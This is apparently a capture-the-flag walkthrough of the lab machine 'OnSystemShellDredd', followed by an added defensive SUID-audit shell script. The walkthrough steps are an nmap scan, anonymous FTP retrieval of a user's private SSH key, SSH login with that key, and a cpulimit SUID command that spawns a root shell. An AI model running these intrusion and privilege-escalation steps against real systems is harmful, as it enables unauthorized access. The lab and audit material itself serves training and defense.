# OnSystemShellDredd

## Nmap

```
sudo nmap 192.168.172.130 -p- -sS -sV

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

FTP on the host is open to anonymous login. Once logged in, use `ls -la` to list hidden files. After changing into the `.hannah` directory, make sure **binary** mode is enabled, then download `id_rsa`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-baf0f94e2bfaf24bb92348b740d704a9b1fbc9b7%2Fimage.png?alt=media)

Change the permissions on `id_rsa` to make it usable.

```
chmod 600 id_rsa
```

Then log in as the user hannah, specifying port 61000.

```
ssh -p 61000 -i id_rsa hannah@192.168.172.130
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-683222b2103a08143f97d000f8e023aa88f3d78c%2Fimage.png?alt=media)

After transferring linpeas to the target machine and running it, the output shows that the `cpulimit` binary has the SUID bit set.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1c3e6805c4fcdd595d775b98a2d939b579658a83%2Fimage.png?alt=media)

Checking GTFOBins against this binary reports the following:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d84843e415177171435f47a6dc4d637243bd4783%2Fimage.png?alt=media)

We can then use the following command to gain a root shell:

```
/usr/bin/cpulimit -l 100 -f -- /bin/sh -p
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1792383a383dc1bb184871294af8a1b75753bfd8%2Fimage.png?alt=media)
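The SUID finding above, seen from the host owner's side: this is an added example, not part of the original writeup, that lists SUID/SGID files under a directory and reports any that are not on a reviewed allowlist. The function names, the one-path-per-line allowlist format and the sample tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag SUID/SGID files that are
# not on a reviewed allowlist. The allowlist holds one absolute path per line.

# list_setid ROOT: print every regular file under ROOT that has the SUID or
# SGID bit set, staying on one filesystem (-xdev), sorted for stable output.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null \
        | LC_ALL=C sort
}

# audit_setid ROOT ALLOWLIST: print set-id files under ROOT whose path is not
# an exact line of ALLOWLIST. Returns 1 if any were found, 0 otherwise.
audit_setid() {
    root=$1; allow=$2
    # -F fixed strings, -x whole-line match, -v keep only paths NOT allowlisted
    unexpected=$(list_setid "$root" | grep -Fxv -f "$allow" || true)
    if [ -n "$unexpected" ]; then
        printf '%s\n' "$unexpected"
        return 1
    fi
    return 0
}

# make_sample_tree: build a constructed directory tree for a dry run and print
# its path. The files are empty placeholders named after real binaries.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/usr/bin"
    : > "$t/usr/bin/passwd";   chmod 4755 "$t/usr/bin/passwd"    # expected SUID
    : > "$t/usr/bin/cpulimit"; chmod 4755 "$t/usr/bin/cpulimit"  # not expected
    : > "$t/usr/bin/ls";       chmod 0755 "$t/usr/bin/ls"        # no set-id bit
    printf '%s\n' "$t/usr/bin/passwd" > "$t/allowlist"
    printf '%s\n' "$t"
}

# Dry run against the constructed tree; on a real host ROOT would be / and the
# allowlist would come from a known-good baseline of the same OS image.
tree=$(make_sample_tree) || exit 1
audit_setid "$tree" "$tree/allowlist" || echo "review the set-id files listed above"
rm -rf "$tree"
```

On a finding like this one, the usual fix is to clear the bit with `chmod u-s` on the reported path, or to remove the package if the binary is not needed.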
